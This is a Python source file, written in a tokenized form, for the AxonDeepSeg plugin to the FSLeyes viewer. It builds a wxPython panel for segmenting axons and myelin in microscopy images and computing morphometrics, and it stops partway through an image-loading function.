"""<import_stmt>wx<import_stmt>wx.lib.agw.hyperlink<as>hl<import_stmt>fsleyes.controls.controlpanel<as>ctrlpanel<import_stmt>fsleyes.actions.loadoverlay<as>ovLoad<import_stmt>numpy<as>np<import_stmt>nibabel<as>nib<import_from_stmt>PIL Image ImageDraw ImageOps<import_stmt>scipy.misc<import_stmt>json<import_from_stmt>pathlib Path<import_stmt>AxonDeepSeg<import_from_stmt>AxonDeepSeg.apply_model axon_segmentation<import_from_stmt>AxonDeepSeg.segment segment_image<import_stmt>AxonDeepSeg.morphometrics.compute_morphometrics<as>compute_morphs<import_from_stmt>AxonDeepSeg postprocessing params ads_utils<import_from_stmt>config axonmyelin_suffix axon_suffix myelin_suffix index_suffix axonmyelin_index_suffix<import_stmt>math<import_from_stmt>scipy ndimage<as>ndi<import_from_stmt>skimage measure morphology feature<import_stmt>tempfile<import_stmt>openpyxl<import_stmt>pandas<as>pd<import_stmt>imageio<line_sep>VERSION="0.2.19"<class_stmt>ADSsettings<block_start>"""
This class handles everything related to the parameters used in the ADS plugin, including the frame for the settings
menu.
"""<def_stmt>__init__ self ads_control<block_start>"""
Constructor for the ADSsettings class. Initializes the default settings.
:param ads_control: An instance of ADScontrol
:type ads_control: ADScontrol
"""<line_sep>self.ads_control=ads_control<line_sep># Declare the settings used
self.overlap_value=25<line_sep>self.model_resolution=0.01# Unused
self.use_custom_resolution=<false># Unused
self.custom_resolution=0.07# Unused
self.zoom_factor=1.0<line_sep>self.axon_shape="circle"<block_end><def_stmt>on_settings_button self event<block_start>"""
This function creates the settings_frame (the settings menu). It is called when the 'settings' button has been
pressed.
"""<line_sep>self.settings_frame=wx.Frame(self.ads_control title="Settings" size=(600 300))<line_sep>frame_sizer_h=wx.BoxSizer(wx.VERTICAL)<line_sep># Add the overlap value to the settings menu
sizer_overlap_value=wx.BoxSizer(wx.HORIZONTAL)<line_sep>overlap_value_tooltip=wx.ToolTip("Represents the number of pixels that overlap two patches of the image when "<concat>"applying the prediction model")<line_sep>sizer_overlap_value.Add(wx.StaticText(self.settings_frame label="Overlap value (pixels): "))<line_sep>self.overlap_value_spinCtrl=wx.SpinCtrl(self.settings_frame min=0 max=100 initial=self.overlap_value)<line_sep>self.overlap_value_spinCtrl.Bind(wx.EVT_SPINCTRL self.on_overlap_value_changed)<line_sep>self.overlap_value_spinCtrl.SetToolTip(overlap_value_tooltip)<line_sep>sizer_overlap_value.Add(self.overlap_value_spinCtrl flag=wx.SHAPED proportion=1)<line_sep>frame_sizer_h.Add(sizer_overlap_value)<line_sep># Add the zoom factor to the settings menu
sizer_zoom_factor=wx.BoxSizer(wx.HORIZONTAL)<line_sep>zoom_factor_tooltip=wx.ToolTip("When applying the model, the pixel size of the image will be "<concat>"multiplied by this number. The zoom factor does not affect the computation of morphometrics.")<line_sep>sizer_zoom_factor.Add(wx.StaticText(self.settings_frame label="Zoom factor: "))<line_sep>self.zoom_factor_spinCtrlDouble=wx.SpinCtrlDouble(self.settings_frame initial=self.zoom_factor inc=0.0001)<line_sep>self.zoom_factor_spinCtrlDouble.Bind(wx.EVT_SPINCTRLDOUBLE self.on_zoom_factor_changed)<line_sep>self.zoom_factor_spinCtrlDouble.SetToolTip(zoom_factor_tooltip)<line_sep>sizer_zoom_factor.Add(self.zoom_factor_spinCtrlDouble flag=wx.SHAPED proportion=1)<line_sep>frame_sizer_h.Add(sizer_zoom_factor)<line_sep># Add the axon shape selection
axon_shape_choices=["circle" "ellipse"]<line_sep>sizer_axon_shape=wx.BoxSizer(wx.HORIZONTAL)<line_sep>axon_shape_tooltip=wx.ToolTip('Select what is the shape of the axons that will be considered when computing '<concat>'the morphometrics. "circle" will use the equivalent diameter (diameter of a circle with the same area as the axon). '<concat>'"ellipse" will use minor axis of a fitted ellipse as diameter.')<line_sep>sizer_axon_shape.Add(wx.StaticText(self.settings_frame label="Axon shape: "))<line_sep>self.axon_shape_combobox=wx.ComboBox(self.settings_frame choices=axon_shape_choices size=(100 20) value=self.axon_shape)<line_sep>self.axon_shape_combobox.Bind(wx.EVT_COMBOBOX self.on_axon_shape_combobox_item_selected)<line_sep>self.axon_shape_combobox.SetToolTip(axon_shape_tooltip)<line_sep>sizer_axon_shape.Add(self.axon_shape_combobox flag=wx.SHAPED proportion=1)<line_sep>frame_sizer_h.Add(sizer_axon_shape)<line_sep># Add the done button
sizer_done_button=wx.BoxSizer(wx.HORIZONTAL)<line_sep>done_button=wx.Button(self.settings_frame label="Done")<line_sep>done_button.Bind(wx.EVT_BUTTON self.on_done_button)<line_sep>sizer_done_button.Add(done_button flag=wx.SHAPED proportion=1)<line_sep>frame_sizer_h.Add(sizer_done_button)<line_sep>self.settings_frame.SetSizer(frame_sizer_h)<line_sep>self.settings_frame.Show()<block_end><def_stmt>on_overlap_value_changed self event<block_start>self.overlap_value=self.overlap_value_spinCtrl.GetValue()<block_end><def_stmt>on_zoom_factor_changed self event<block_start>self.zoom_factor=self.zoom_factor_spinCtrlDouble.GetValue()<block_end><def_stmt>on_axon_shape_combobox_item_selected self event<block_start>self.axon_shape=self.axon_shape_combobox.GetStringSelection()<block_end><def_stmt>on_done_button self event# TODO: make sure every setting is saved
<block_start>self.settings_frame.Close()<block_end><block_end><class_stmt>ADScontrol(ctrlpanel.ControlPanel)<block_start>"""
This class is the object corresponding to the AxonDeepSeg control panel.
"""<def_stmt>__init__ self ortho *args **kwargs<block_start>"""
This function initializes the control panel. It generates the widgets and adds them to the panel. It also sets
the initial position of the panel to the left.
:param ortho: This is used to access the ortho ops in order to turn off the X and Y canvas as well as the cursor
"""<line_sep>ctrlpanel.ControlPanel.__init__(self ortho *args **kwargs)<line_sep># Create the settings object
self.settings=ADSsettings(self)<line_sep># Add a sizer to the control panel
# This sizer will contain the buttons
sizer_h=wx.BoxSizer(wx.VERTICAL)<line_sep># Add the logo to the control panel
ADS_logo=self.get_logo()<line_sep>sizer_h.Add(ADS_logo flag=wx.SHAPED proportion=1)<line_sep># Add the citation to the control panel
citation_box=wx.TextCtrl(self value=self.get_citation() size=(100 50) style=wx.TE_MULTILINE)<line_sep>sizer_h.Add(citation_box flag=wx.SHAPED proportion=1)<line_sep># Add a hyperlink to the documentation
hyper=hl.HyperLinkCtrl(self -1 label="Need help? Read the documentation" URL="https://axondeepseg.readthedocs.io/en/latest/")<line_sep>sizer_h.Add(hyper flag=wx.SHAPED proportion=1)<line_sep># Define the color of button labels
button_label_color=(0 0 0)<line_sep># Add the image loading button
load_png_button=wx.Button(self label="Load PNG or TIF file")<line_sep>load_png_button.SetForegroundColour(button_label_color)<line_sep>load_png_button.Bind(wx.EVT_BUTTON self.on_load_png_button)<line_sep>load_png_button.SetToolTip(wx.ToolTip("Loads a .png or .tif file into FSLeyes"))<line_sep>sizer_h.Add(load_png_button flag=wx.SHAPED proportion=1)<line_sep># Add the mask loading button
load_mask_button=wx.Button(self label="Load existing mask")<line_sep>load_mask_button.SetForegroundColour(button_label_color)<line_sep>load_mask_button.Bind(wx.EVT_BUTTON self.on_load_mask_button)<line_sep>load_mask_button.SetToolTip(wx.ToolTip("Loads an existing axonmyelin mask into FSLeyes. "<concat>"The selected image should contain both the axon and myelin masks. "<concat>"The regions on the image should have an intensity of 0 for the background, "<concat>"127 for the myelin and 255 for the axons. "))<line_sep>sizer_h.Add(load_mask_button flag=wx.SHAPED proportion=1)<line_sep># Add the model choice combobox
self.model_combobox=wx.ComboBox(self choices=ads_utils.get_existing_models_list() size=(100 20) value="Select the modality" )<line_sep>self.model_combobox.SetForegroundColour(button_label_color)<line_sep>self.model_combobox.SetToolTip(wx.ToolTip("Select the modality used to acquire the image"))<line_sep>sizer_h.Add(self.model_combobox flag=wx.SHAPED proportion=1)<line_sep># Add the button that applies the prediction model
apply_model_button=wx.Button(self label="Apply ADS prediction model")<line_sep>apply_model_button.SetForegroundColour(button_label_color)<line_sep>apply_model_button.Bind(wx.EVT_BUTTON self.on_apply_model_button)<line_sep>apply_model_button.SetToolTip(wx.ToolTip("Applies the prediction model and displays the masks"))<line_sep>sizer_h.Add(apply_model_button flag=wx.SHAPED proportion=1)<line_sep># The Watershed button's purpose isn't clear. It is unavailable for now.
# # Add the button that runs the watershed algorithm
# run_watershed_button = wx.Button(self, label="Run Watershed")
# run_watershed_button.Bind(wx.EVT_BUTTON, self.on_run_watershed_button)
# run_watershed_button.SetToolTip(
# wx.ToolTip(
# "Uses a watershed algorithm to find the different axon+myelin"
# "objects. This is used to see if where are connections"
# " between two axon+myelin objects."
# )
# )
# sizer_h.Add(run_watershed_button, flag=wx.SHAPED, proportion=1)
# Add the fill axon tool
fill_axons_button=wx.Button(self label="Fill axons")<line_sep>fill_axons_button.SetForegroundColour(button_label_color)<line_sep>fill_axons_button.Bind(wx.EVT_BUTTON self.on_fill_axons_button)<line_sep>fill_axons_button.SetToolTip(wx.ToolTip("Automatically fills the axons inside myelin objects."<concat>" THE MYELIN OBJECTS NEED TO BE CLOSED AND SEPARATED FROM EACH "<concat>"OTHER (THEY MUST NOT TOUCH) FOR THIS TOOL TO WORK CORRECTLY."))<line_sep>sizer_h.Add(fill_axons_button flag=wx.SHAPED proportion=1)<line_sep># Add the save Segmentation button
save_segmentation_button=wx.Button(self label="Save segmentation")<line_sep>save_segmentation_button.SetForegroundColour(button_label_color)<line_sep>save_segmentation_button.Bind(wx.EVT_BUTTON self.on_save_segmentation_button)<line_sep>save_segmentation_button.SetToolTip(wx.ToolTip("Saves the axon and myelin masks in the selected folder"))<line_sep>sizer_h.Add(save_segmentation_button flag=wx.SHAPED proportion=1)<line_sep># Add compute morphometrics button
compute_morphometrics_button=wx.Button(self label="Compute morphometrics")<line_sep>compute_morphometrics_button.SetForegroundColour(button_label_color)<line_sep>compute_morphometrics_button.Bind(wx.EVT_BUTTON self.on_compute_morphometrics_button)<line_sep>compute_morphometrics_button.SetToolTip(wx.ToolTip("Calculates and saves the morphometrics to an excel and csv file. "<concat>"Shows the indexes of the axons at the coordinates specified in the morphometrics file."))<line_sep>sizer_h.Add(compute_morphometrics_button flag=wx.SHAPED proportion=1)<line_sep># Add the settings button
settings_button=wx.Button(self label="Settings")<line_sep>settings_button.SetForegroundColour(button_label_color)<line_sep>settings_button.Bind(wx.EVT_BUTTON self.settings.on_settings_button)<line_sep>sizer_h.Add(settings_button flag=wx.SHAPED proportion=1)<line_sep># Set the sizer of the control panel
self.SetSizer(sizer_h)<line_sep># Initialize the variables that are used to track the active image
self.png_image_name=[]<line_sep>self.image_dir_path=[]<line_sep>self.most_recent_watershed_mask_name=<none><line_sep># Toggle off the X and Y canvas
oopts=ortho.sceneOpts<line_sep>oopts.showXCanvas=<false><line_sep>oopts.showYCanvas=<false><line_sep># Toggle off the cursor
oopts.showCursor=<false><line_sep># Toggle off the radiological orientation
self.displayCtx.radioOrientation=<false><line_sep># Invert the Y display
self.frame.viewPanels[0].frame.viewPanels[0].getZCanvas().opts.invertY=<true><line_sep># Create a temporary directory that will hold the NIfTI files
self.ads_temp_dir_var=tempfile.TemporaryDirectory()#This variable needs to stay loaded to keep the temporary
# directory from being destroyed
self.ads_temp_dir=Path(self.ads_temp_dir_var.name)<line_sep># Check the version
self.verrify_version()<block_end><def_stmt>on_load_png_button self event<block_start>"""
This function is called when the user presses on the Load Png button. It allows the user to select a PNG or TIF
image, convert it into a NIfTI and load it into FSLeyes.
"""<line_sep># Ask the user which file he wants to convert
<with_stmt>wx.FileDialog(self "select Image file" style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)<as>file_dialog<block_start><if_stmt>(file_dialog.ShowModal()<eq>wx.ID_CANCEL)# The user cancelled the operation
<block_start><return><block_end>in_file=Path(file_dialog.GetPath())<block_end># Check if the image format is valid
image_extension=in_file.suffix<line_sep>valid_extensions=[".png" ".tif" ".jpg" ".jpeg"]<if_stmt>image_extension<not><in>valid_extensions<block_start>self.show_message("Invalid file extension")<line_sep><return><block_end># Store the directory path and image name for later use in the application of the prediction model
self.image_dir_path.append(in_file.parents[0])<line_sep>self.png_image_name.append(in_file.name)<line_sep># Call the function that convert and loads the png or tif image
self.load_png_image_from_path(in_file)<block_end><def_stmt>on_load_mask_button self event<block_start>"""
This function is called when the user presses on the loadMask button. It allows the user to select an existing
PNG mask, convert it into a NIfTI and load it into FSLeyes.
The mask needs to contain an axon + myelin mask. The Axons should have an intensity > 200. The myelin should
have an intensity between 100 and 200. The data should be in uint8.
"""<line_sep># Ask the user to select the mask image
<with_stmt>wx.FileDialog(self "select mask .png file" style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)<as>file_dialog<block_start><if_stmt>(file_dialog.ShowModal()<eq>wx.ID_CANCEL)# The user cancelled the operation
<block_start><return><block_end>in_file=Path(file_dialog.GetPath())<block_end># Check if the image format is valid
image_extension=in_file.suffix<line_sep>valid_extensions=[".png" ".tif" ".jpg" ".jpeg"]<if_stmt>image_extension<not><in>valid_extensions<block_start>self.show_message("Invalid file extension")<line_sep><return><block_end># Get the image data
img_png2D=ads_utils.imread(in_file)<line_sep>image_name=in_file.stem<line_sep># Extract the Axon mask
axon_mask=img_png2D<g>200<line_sep>axon_mask=params.intensity['binary']<times>np.array(axon_mask dtype=np.uint8)<line_sep># Extract the Myelin mask
myelin_mask=(img_png2D<g>100)&(img_png2D<l>200)<line_sep>myelin_mask=params.intensity['binary']<times>np.array(myelin_mask dtype=np.uint8)<line_sep># Load the masks into FSLeyes
axon_outfile=self.ads_temp_dir/(image_name+"-axon.png")<line_sep>ads_utils.imwrite(axon_outfile axon_mask)<line_sep>self.load_png_image_from_path(axon_outfile is_mask=<true> colormap="blue")<line_sep>myelin_outfile=self.ads_temp_dir/(image_name+"-myelin.png")<line_sep>ads_utils.imwrite(myelin_outfile myelin_mask)<line_sep>self.load_png_image_from_path(myelin_outfile is_mask=<true> colormap="red")<block_end><def_stmt>on_apply_model_button self event<block_start>"""
This function is called when the user presses on the ApplyModel button. It is used to apply the prediction model
selected in the combobox. The segmentation masks are then loaded into FSLeyes
"""<line_sep># Declare the default resolution of the model
resolution=0.1<line_sep># Get the image name and directory
image_overlay=self.get_visible_image_overlay()<if_stmt>self.get_visible_image_overlay()<is><none><block_start><return><block_end>n_loaded_images=self.png_image_name.__len__()<line_sep>image_name=<none><line_sep>image_directory=<none><for_stmt>i range(n_loaded_images)<block_start><if_stmt>image_overlay.name<eq>(Path(self.png_image_name[i])).stem<block_start>image_name=self.png_image_name[i]<line_sep>image_directory=self.image_dir_path[i]<block_end><block_end><if_stmt>(image_name<is><none>)<or>(image_directory<is><none>)<block_start>self.show_message("Couldn't find the path to the loaded image. "<concat>"Please use the plugin's image loader to import the image you wish to segment. ")<line_sep><return><block_end>image_path=image_directory/image_name<line_sep>image_name_no_extension=Path(image_name).stem<line_sep># Get the selected model
selected_model=self.model_combobox.GetStringSelection()<if_stmt>selected_model<eq>""<block_start>self.show_message("Please select a model")<line_sep><return><block_end># Get the path of the selected model
<if_stmt>any(selected_model<in>models<for>models ads_utils.get_existing_models_list())<block_start>dir_path=Path(AxonDeepSeg.__file__).parents[0]<line_sep>model_path=dir_path/"models"/selected_model<block_end><else_stmt><block_start>self.show_message("Please select a model")<line_sep><return><block_end># If the TEM model is selected, modify the resolution
<if_stmt>"TEM"<in>selected_model.upper()<block_start>resolution=0.01<block_end># Check if the pixel size txt file exist in the imageDirPath
pixel_size_exists=(image_directory/"pixel_size_in_micrometer.txt").exists()<line_sep># if it doesn't exist, ask the user to input the pixel size
<if_stmt>pixel_size_exists<is><false><block_start><with_stmt>wx.TextEntryDialog(self "Enter the pixel size in micrometer" value="0.07")<as>text_entry<block_start><if_stmt>text_entry.ShowModal()<eq>wx.ID_CANCEL<block_start><return><block_end>pixel_size_str=text_entry.GetValue()<block_end>pixel_size_float=float(pixel_size_str)<block_end><else_stmt># read the pixel size
<block_start>resolution_file=open((image_directory/"pixel_size_in_micrometer.txt").__str__() 'r')<line_sep>pixel_size_float=float(resolution_file.read())<block_end># Load model configs and apply prediction
model_configfile=model_path/"config_network.json"<with_stmt>open(model_configfile.__str__() "r")<as>fd<block_start>config_network=json.loads(fd.read())<block_end>segment_image(image_path model_path self.settings.overlap_value config_network resolution acquired_resolution=pixel_size_float<times>self.settings.zoom_factor verbosity_level=3)<line_sep># The axon_segmentation function creates the segmentation masks and stores them as PNG files in the same folder
# as the original image file.
# Load the axon and myelin masks into FSLeyes
axon_mask_path=image_directory/(image_name_no_extension+str(axon_suffix))<line_sep>myelin_mask_path=image_directory/(image_name_no_extension+str(myelin_suffix))<line_sep>self.load_png_image_from_path(axon_mask_path is_mask=<true> colormap="blue")<line_sep>self.load_png_image_from_path(myelin_mask_path is_mask=<true> colormap="red")<line_sep>self.pixel_size_float=pixel_size_float<line_sep><return>self<block_end><def_stmt>on_save_segmentation_button self event<block_start>"""
This function saves the active myelin and axon masks as PNG images. Three (3) images are generated in a folder
selected by the user : one with the axon mask, one with the myelin mask and one with both.
"""<line_sep># Find the visible myelin and axon masks
axon_mask_overlay=self.get_corrected_axon_overlay()<if_stmt>axon_mask_overlay<is><none><block_start>axon_mask_overlay=self.get_visible_axon_overlay()<block_end>myelin_mask_overlay=self.get_visible_myelin_overlay()<if_stmt>(axon_mask_overlay<is><none>)<or>(myelin_mask_overlay<is><none>)<block_start><return><block_end># Ask the user where to save the segmentation
<with_stmt>wx.DirDialog(self "select the directory in which the segmentation will be save" defaultPath="" style=wx.DD_DEFAULT_STYLE|wx.DD_DIR_MUST_EXIST )<as>file_dialog<block_start><if_stmt>file_dialog.ShowModal()<eq>wx.ID_CANCEL<block_start><return><block_end><block_end>save_dir=Path(file_dialog.GetPath())<line_sep># store the data of the masks in variables as numpy arrays.
# Note: since PIL uses a different convention for the X and Y coordinates, some array manipulation has to be
# done.
# Note 2 : The image array loaded in FSLeyes is flipped. We need to flip it back
myelin_array=np.array(myelin_mask_overlay[: : 0] copy=<true> dtype=np.uint8)<line_sep>myelin_array=np.flipud(myelin_array)<line_sep>myelin_array=np.rot90(myelin_array k=1 axes=(1 0))<line_sep>axon_array=np.array(axon_mask_overlay[: : 0] copy=<true> dtype=np.uint8)<line_sep>axon_array=np.flipud(axon_array)<line_sep>axon_array=np.rot90(axon_array k=1 axes=(1 0))<line_sep># Make sure the masks have the same size
<if_stmt>myelin_array.shape<ne>axon_array.shape<block_start>self.show_message("invalid visible masks dimensions")<line_sep><return><block_end># Remove the intersection
myelin_array,axon_array,intersection=postprocessing.remove_intersection(myelin_array axon_array priority=1 return_overlap=<true>)<if_stmt>intersection.sum()<g>0<block_start>self.show_message("There is an overlap between the axon mask and the myelin mask. The myelin will have priority.")<block_end># Scale the pixel values of the masks to 255 for image saving
myelin_array=myelin_array<times>params.intensity['binary']<line_sep>axon_array=axon_array<times>params.intensity['binary']<line_sep>image_name=myelin_mask_overlay.name[:-len("_seg-myelin")]<line_sep>myelin_and_axon_array=(myelin_array<floordiv>2+axon_array).astype(np.uint8)<line_sep>ads_utils.imwrite(filename=save_dir/(image_name+str(axonmyelin_suffix)) img=myelin_and_axon_array)<line_sep>ads_utils.imwrite(filename=save_dir/(image_name+str(myelin_suffix)) img=myelin_array)<line_sep>ads_utils.imwrite(filename=save_dir/(image_name+str(axon_suffix)) img=axon_array)<block_end><def_stmt>on_run_watershed_button self event<block_start>"""
This function is called then the user presses on the runWatershed button. This creates a watershed mask that is
used to locate where are the connections between the axon-myelin objects.
The runWatershed button is currently commented, so this function is unused at the moment.
"""<line_sep># Find the visible myelin and axon masks
axon_mask_overlay=self.get_visible_axon_overlay()<line_sep>myelin_mask_overlay=self.get_visible_myelin_overlay()<if_stmt>(axon_mask_overlay<is><none>)<or>(myelin_mask_overlay<is><none>)<block_start><return><block_end># Extract the data from the overlays
axon_array=axon_mask_overlay[: : 0]<line_sep>myelin_array=myelin_mask_overlay[: : 0]<line_sep># Make sure the masks have the same size
<if_stmt>myelin_array.shape<ne>axon_array.shape<block_start>self.show_message("invalid visible masks dimensions")<line_sep><return><block_end># If a watershed mask already exists, remove it.
<for_stmt>an_overlay self.overlayList<block_start><if_stmt>(self.most_recent_watershed_mask_name<is><not><none>)<and>(an_overlay.name<eq>self.most_recent_watershed_mask_name)<block_start>self.overlayList.remove(an_overlay)<block_end><block_end># Compute the watershed mask
watershed_data=self.get_watershed_segmentation(axon_array myelin_array)<line_sep># Save the watershed mask as a png then load it as an overlay
watershed_image_array=np.rot90(watershed_data k=3 axes=(1 0))<line_sep>watershed_image=Image.fromarray(watershed_image_array)<line_sep>file_name=self.ads_temp_dir.name+"/watershed_mask.png"<line_sep>watershed_image.save(file_name)<line_sep>wantershed_mask_overlay=self.load_png_image_from_path(file_name add_to_overlayList=<false>)<line_sep>wantershed_mask_overlay[: : 0]=watershed_data<line_sep>self.overlayList.append(wantershed_mask_overlay)<line_sep># Apply a "random" colour mapping to the watershed mask
opts=self.displayCtx.getOpts(wantershed_mask_overlay)<line_sep>opts.cmap="random"<line_sep>self.most_recent_watershed_mask_name="watershed_mask"<block_end><def_stmt>on_fill_axons_button self event<block_start>"""
This function is called when the fillAxon button is pressed by the user. It uses a flood fill algorithm to fill
the inside of the myelin objects with the axon mask
"""<line_sep># Find the visible myelin and axon mask
myelin_mask_overlay=self.get_visible_myelin_overlay()<line_sep>axon_mask_overlay=self.get_visible_axon_overlay()<if_stmt>myelin_mask_overlay<is><none><block_start><return><block_end><if_stmt>axon_mask_overlay<is><none><block_start><return><block_end># Extract the data from the overlays
myelin_array=myelin_mask_overlay[: : 0]<line_sep>axon_array=axon_mask_overlay[: : 0]<line_sep># Perform the floodfill operation
axon_extracted_array=postprocessing.floodfill_axons(axon_array myelin_array)<line_sep>axon_corr_array=np.flipud(axon_extracted_array)<line_sep>axon_corr_array=params.intensity['binary']<times>np.rot90(axon_corr_array k=1 axes=(1 0))<line_sep>file_name=self.ads_temp_dir/(myelin_mask_overlay.name[:-len("-myelin")]+"-axon-corr.png")<line_sep>ads_utils.imwrite(filename=file_name img=axon_corr_array)<line_sep>self.load_png_image_from_path(file_name is_mask=<true> colormap="blue")<block_end><def_stmt>on_compute_morphometrics_button self event<block_start>"""
Compute morphometrics and save them to an Excel file.
"""<line_sep># Get pixel size
<try_stmt><block_start>pixel_size=self.pixel_size_float<block_end><except_stmt><block_start><with_stmt>wx.TextEntryDialog(self "Enter the pixel size in micrometer" value="0.07")<as>text_entry<block_start><if_stmt>text_entry.ShowModal()<eq>wx.ID_CANCEL<block_start><return><block_end>pixel_size_str=text_entry.GetValue()<block_end>pixel_size=float(pixel_size_str)<block_end># Find the visible myelin and axon masks
axon_mask_overlay=self.get_corrected_axon_overlay()<if_stmt>axon_mask_overlay<is><none><block_start>axon_mask_overlay=self.get_visible_axon_overlay()<block_end>myelin_mask_overlay=self.get_visible_myelin_overlay()<if_stmt>(axon_mask_overlay<is><none>)<or>(myelin_mask_overlay<is><none>)<block_start><return><block_end># store the data of the masks in variables as numpy arrays.
# Note: since PIL uses a different convention for the X and Y coordinates, some array manipulation has to be
# done.
# Note 2 : The image array loaded in FSLeyes is flipped. We need to flip it back
myelin_array=np.array(myelin_mask_overlay[: : 0]<times>params.intensity['binary'] copy=<true> dtype=np.uint8)<line_sep>myelin_array=np.flipud(myelin_array)<line_sep>myelin_array=np.rot90(myelin_array k=1 axes=(1 0))<line_sep>axon_array=np.array(axon_mask_overlay[: : 0]<times>params.intensity['binary'] copy=<true> dtype=np.uint8)<line_sep>axon_array=np.flipud(axon_array)<line_sep>axon_array=np.rot90(axon_array k=1 axes=(1 0))<line_sep># Make sure the masks have the same size
<if_stmt>myelin_array.shape<ne>axon_array.shape<block_start>self.show_message("invalid visible masks dimensions")<line_sep><return><block_end># Save the arrays as PNG files
pred=(myelin_array<floordiv>2+axon_array).astype(np.uint8)<line_sep>pred_axon=pred<g>200<line_sep>pred_myelin=np.logical_and(pred<ge>50 pred<le>200)<line_sep>x=np.array([] dtype=[('x0' 'f4') ('y0' 'f4') ('gratio' 'f4') ('axon_area' 'f4') ('axon_perimeter' 'f4') ('myelin_area' 'f4') ('axon_diam' 'f4') ('myelin_thickness' 'f4') ('axonmyelin_area' 'f4') ('axonmyelin_perimeter' 'f4') ('solidity' 'f4') ('eccentricity' 'f4') ('orientation' 'f4')])<line_sep># Compute statistics
stats_array,index_image_array=compute_morphs.get_axon_morphometrics(im_axon=pred_axon im_myelin=pred_myelin pixel_size=pixel_size axon_shape=self.settings.axon_shape return_index_image=<true>)<for_stmt>stats stats_array<block_start>x=np.append(x np.array([(stats['x0'] stats['y0'] stats['gratio'] stats['axon_area'] stats['axon_perimeter'] stats['myelin_area'] stats['axon_diam'] stats['myelin_thickness'] stats['axonmyelin_area'] stats['axonmyelin_perimeter'] stats['solidity'] stats['eccentricity'] stats['orientation'])] dtype=x.dtype))<block_end><with_stmt>wx.FileDialog(self "Save morphometrics file" wildcard="Excel files (*.xlsx)|*.xlsx" defaultFile="axon_morphometrics.xlsx" style=wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT)<as>fileDialog<block_start><if_stmt>fileDialog.ShowModal()<eq>wx.ID_CANCEL<block_start><return><block_end># the user changed their mind
# save the current contents in the file
pathname=fileDialog.GetPath()<if_stmt><not>(pathname.lower().endswith((".xlsx" ".csv")))# If the user didn't add the extension, add it here
<block_start>pathname=pathname+".xlsx"<block_end><try_stmt># Export to excel
<block_start>pd.DataFrame(x).to_excel(pathname)<block_end><except_stmt>IOError<block_start>wx.LogError("Cannot save current data in file '%s'."%pathname)<block_end><block_end># Generate and load the index image
original_image_name=(axon_mask_overlay.name).split("-axon")[0]<line_sep>original_image_name=original_image_name.split("_seg")[0]<line_sep>index_outfile=Path(pathname).parents[0]/(original_image_name+str(index_suffix))<line_sep>ads_utils.imwrite(index_outfile index_image_array)<line_sep>self.load_png_image_from_path(index_outfile is_mask=<false> colormap="yellow")<line_sep># Generate the colored image with indexes
axon_array,myelin_array=postprocessing.remove_intersection(axon_array<floordiv>255 myelin_array<floordiv>255)<line_sep>axonmyelin_image=axon_array<times>params.intensity["axon"]+myelin_array<times>params.intensity["myelin"]<line_sep>axonmyelin_outfile=self.ads_temp_dir/axonmyelin_suffix<line_sep>ads_utils.imwrite(axonmyelin_outfile axonmyelin_image)<line_sep>postprocessing.generate_and_save_colored_image_with_index_numbers(filename=Path(pathname).parents[0]/(original_image_name+str(axonmyelin_index_suffix)) axonmyelin_image_path=axonmyelin_outfile index_image_array=index_image_array)<line_sep><return><block_end><def_stmt>get_watershed_segmentation self im_axon im_myelin return_centroids=<false><block_start>"""
Parts of this function were copied from the code found in this document :
https://github.com/neuropoly/axondeepseg/blob/master/AxonDeepSeg/morphometrics/compute_morphometrics.py
In the future, the referenced script should be modified in order to avoid repetition.
:param im_axon: the binary mask corresponding to axons
:type im_axon: ndarray
:param im_myelin: the binary mask corresponding to the myelin
:type im_myelin: ndarray
:param return_centroids: (optional) if this is set to true, the function will also return the centroids of the
axon objects as a list of tuples
:type return_centroids: bool
:return: the label corresponding to the axon+myelin objects
:rtype: ndarray
"""<line_sep># Label each axon object
im_axon_label=measure.label(im_axon)<line_sep># Measure properties for each axon object
axon_objects=measure.regionprops(im_axon_label)<line_sep># Deal with myelin mask
<if_stmt>im_myelin<is><not><none># sum axon and myelin masks
<block_start>im_axonmyelin=im_axon+im_myelin<line_sep># Compute distance between each pixel and the background. Note: this distance is calculated from the im_axon,
# note from the im_axonmyelin image, because we know that each axon object is already isolated, therefore the
# distance metric will be more useful for the watershed algorithm below.
distance=ndi.distance_transform_edt(im_axon)<line_sep># local_maxi = feature.peak_local_max(distance, indices=False, footprint=np.ones((31, 31)), labels=axonmyelin)
# Get axon centroid as int (not float) to be used as index
ind_centroid=([int(props.centroid[0])<for>props axon_objects] [int(props.centroid[1])<for>props axon_objects] )<line_sep># Create an image with axon centroids, which value corresponds to the value of the axon object
im_centroid=np.zeros_like(im_axon dtype="uint16")<for_stmt>i range(len(ind_centroid[0]))# Note: The value "i" corresponds to the label number of im_axon_label
<block_start>im_centroid[ind_centroid[0][i] ind_centroid[1][i]]=i+1<block_end># Watershed segmentation of axonmyelin using distance map
im_axonmyelin_label=morphology.watershed(-distance im_centroid mask=im_axonmyelin)<if_stmt>return_centroids<is><true><block_start><return>im_axonmyelin_label ind_centroid<block_end><else_stmt><block_start><return>im_axonmyelin_label<block_end><block_end><block_end><def_stmt>load_png_image_from_path self image_path is_mask=<false> add_to_overlayList=<true> colormap="greyscale"<block_start>"""
This function converts a 2D image into a NIfTI image and loads it as an overlay.
The parameter add_to_overlayList allows to display the overlay into FSLeyes.
:param image_path: The location of the image, including the name and the .extension
:type image_path: Path
:param is_mask: (optional) Whether or not this is a segmentation mask. It will be treated as a normal
image by default.
:type is_mask: bool
:param add_to_overlayList: (optional) Whether or not to add the image to the overlay list. If so, the image will
be displayed in the application. This parameter is True by default.
:type add_to_overlayList: bool
:param colormap: (optional) the colormap of image that will be displayed. This parameter is set to greyscale by
default.
:type colormap: string
:return: the FSLeyes overlay corresponding to the loaded image.
:rtype: overlay
"""<line_sep># Open the 2D image
img_png2D=ads_utils.imread(image_path)<if_stmt>is_mask<is><true><block_start>img_png2D=img_png2D<floordiv>params.intensity['binary']<block_end># Segmentation masks should be binary
# Flip the image on the Y axis so that the morphometrics file shows the right coordinates
img_png2D=np.flipud(img_png2D)<line_sep># Convert image data into a NIfTI image
# Note: PIL and NiBabel use different axis conventions, so some array manipulation has to be done.
img_NIfTI=nib.Nifti1Image(np.rot90(img_png2D k=1 axes=(1 0)) np.eye(4))<line_sep># Save the NIfTI image in a temporary directory
img_name=image_path.stem<line_sep>out_file=self.ads_temp_dir.__str__()+"/"+img_name+".nii.gz"<line_sep>nib.save(img_NIfTI out_file)<line_sep># Load the NIfTI image as an overlay
